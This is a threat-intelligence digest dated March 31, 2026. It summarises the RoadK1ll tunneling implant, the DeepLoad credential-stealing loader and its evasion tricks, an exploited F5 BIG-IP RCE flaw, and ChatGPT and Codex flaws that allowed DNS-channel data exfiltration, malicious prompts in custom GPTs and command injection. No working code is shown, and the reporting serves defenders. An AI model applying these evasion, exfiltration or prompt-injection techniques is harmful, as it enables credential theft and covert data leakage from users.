Cyware Daily Threat Intelligence, March 31, 2026

The barrier between isolated networks and the open web is thinning as new implants and AI vulnerabilities turn trusted systems into launchpads for data theft. The lightweight RoadK1ll reverse tunneling tool allows attackers to pivot through compromised environments using a custom WebSocket protocol, effectively transforming infected machines into relay points to access unreachable internal services.

Phishing has entered a new phase of automation with DeepLoad, a sophisticated loader that pairs ClickFix social engineering with AI-generated obfuscation to bypass static scanners. The malware evades monitoring while extracting browser credentials and installing real-time data-capturing extensions.

The trust placed in AI ecosystems is facing a critical test as researchers uncover foundational vulnerabilities in how OpenAI handles data and credentials. A newly disclosed flaw in ChatGPT’s code execution runtime allowed sensitive user data to be exfiltrated via a hidden DNS side-channel.

Top Malware Reported in the Last 24 Hours

New RoadK1ll malware enables network pivoting

A newly identified malware implant named RoadK1ll allows attackers to navigate through compromised networks by utilizing a custom WebSocket protocol. Discovered by Blackpoint during an incident response, this lightweight reverse tunneling tool transforms infected machines into relay points, enabling attackers to access internal services and systems that are otherwise unreachable. RoadK1ll establishes outbound connections to attacker-controlled infrastructure, facilitating covert communication and traffic forwarding without detection. It supports multiple commands, including opening TCP connections and managing data flow, while its reconnection mechanism ensures persistent access even if the channel is interrupted. However, it operates without traditional persistence methods, relying solely on the active process of the implant.

DeepLoad malware uses ClickFix for theft

DeepLoad is a sophisticated malware that employs the ClickFix social engineering tactic to distribute itself and steal browser credentials. It utilizes AI-assisted obfuscation and process injection to evade detection, starting its attack by tricking users into executing PowerShell commands via a deceptive lure. The malware hides within legitimate Windows processes, such as "LockAppHost.exe," and disables PowerShell command history to avoid monitoring. It generates a temporary Dynamic Link Library (DLL) in the user’s Temp directory to bypass file-based detection and employs asynchronous procedure call injection to execute its payload covertly. DeepLoad not only extracts browser passwords but also installs malicious extensions that capture credentials in real-time. Additionally, it can reinfect hosts using Windows Management Instrumentation, ensuring persistence without user interaction.

Top Vulnerabilities Reported in the Last 24 Hours

F5 BIG-IP vulnerability exploited in attacks

F5 Networks has reclassified a vulnerability in its BIG-IP APM (Access Policy Manager) as a critical RCE flaw, previously identified as a denial-of-service (DoS) issue. This security flaw, tracked as CVE-2025-53521, allows attackers to execute remote code on unpatched devices without requiring privileges, particularly targeting systems with specific access policies. F5 warned that the vulnerability is actively being exploited to deploy webshells, prompting the CISA to include it on its KEV catalog. With over 240,000 BIG-IP instances exposed online, the extent of vulnerable configurations remains uncertain. 

OpenAI patches vulnerabilities in ChatGPT, Codex

A newly discovered vulnerability in OpenAI's ChatGPT allowed sensitive user data to be exfiltrated covertly through a DNS-based communication channel, bypassing existing security measures. This flaw enabled attackers to exploit the Linux runtime used by the AI, potentially gaining remote shell access and executing commands without user knowledge. The risk escalates with custom GPTs that could embed malicious prompts, making data leakage undetectable. Concurrently, a critical command injection vulnerability in OpenAI's Codex platform could compromise GitHub credentials, allowing attackers to execute arbitrary commands and access users' codebases.